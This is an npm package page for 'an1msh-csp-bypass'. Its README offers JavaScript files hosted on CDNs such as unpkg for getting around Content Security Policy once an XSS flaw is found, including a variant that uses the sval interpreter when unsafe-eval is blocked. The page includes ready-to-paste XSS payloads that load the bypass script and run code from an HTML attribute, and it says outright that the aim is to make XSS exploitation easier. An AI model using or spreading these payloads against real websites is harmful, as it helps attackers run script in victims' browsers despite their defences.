npm
Sign UpSign In

an1msh-csp-bypass

1.0.2 • Public • Published

easy-csp-bypass

Just a fun project to see if this code can end up in some CDN, so it would be easier to exploit XSS with CSP.

How to use ?

Well, it depends. If you are lucky enough to find unsafe-eval in the CSP configuration, you can use those scenario:

  • Classic => /dist/classic.js
  • Classic-infinite => /dist/classic-infinite.js
  • Url => /dist/url.js

If you can't use eval() because unsafe-eval is not in the configuration, well it's not over !! I found a Javascript interpreter called sval. It can easily bypass the unsafe-eval restriction :) !

  • Classic => /dist/sval-classic.js
  • Classic-infinite => /dist/sval-infinite.js
  • Url => /dist/sval-url.js

Example

If you have an XSS on a website with CSP, search in the directive 'script-src' for unpkg.com or jsdeliver. If these domain are whitelist, you win !

  <script src="https://unpkg.com/csp-bypass@1.0.2-0/dist/classic.js"></script>
  <br csp="alert(1)">

if 'unsafe-eval' is missing use the sval one:

  <script src="https://unpkg.com/csp-bypass@1.0.2-0/dist/sval-classic.js"></script>
  <br csp="alert(1)">

/an1msh-csp-bypass/

    Package Sidebar

    Install

    npm i an1msh-csp-bypass

    Repository

    github.com/CanardMandarin/csp-bypass

    Homepage

    github.com/CanardMandarin/csp-bypass.git#readme

    Weekly Downloads

    1

    Version

    1.0.2

    License

    SEE LICENSE IN LICENSE

    Unpacked Size

    491 kB

    Total Files

    24

    Last publish

    Collaborators

    • an1msh
    Try on RunKit
    Report malware